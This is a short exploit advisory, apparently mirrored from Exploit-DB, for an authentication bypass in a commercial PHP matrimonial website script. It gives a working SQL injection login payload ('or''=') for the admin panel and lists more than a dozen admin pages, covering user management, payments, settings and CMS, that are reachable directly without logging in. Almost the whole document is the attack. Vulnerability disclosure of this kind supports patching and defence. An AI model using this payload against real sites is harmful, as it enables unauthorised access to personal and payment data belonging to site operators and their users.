Hindu Matrimonial Script – Authentication Bypass - 体验盒子

作者： Ihsan Sencan

日期： 2017-01-13

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/41044/

# # # # # 
# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
# Date: 13.01.2017
# Vendor Homepage: http://www.phpmatrimonialscript.in/
# Script Name: Hindu Matrimonial Script
# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
#
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
#
# Direct entrance Add/Edit...
# http://localhost/[PATH]/admin/usermanagement.php
# http://localhost/[PATH]/admin/countrymanagement.php
# http://localhost/[PATH]/admin/communitymanagement.php
# http://localhost/[PATH]/admin/renewaldue.php
# http://localhost/[PATH]/admin/generalsettings.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/newsletter1.php
# http://localhost/[PATH]/admin/payment.php
# http://localhost/[PATH]/admin/searchview.php
# http://localhost/[PATH]/admin/success_story.php
# http://localhost/[PATH]/admin/featured.php
# http://localhost/[PATH]/admin/photo.php
# http://localhost/[PATH]/admin/googleads.php
# http://localhost/[PATH]/admin/reports.php
# # # # #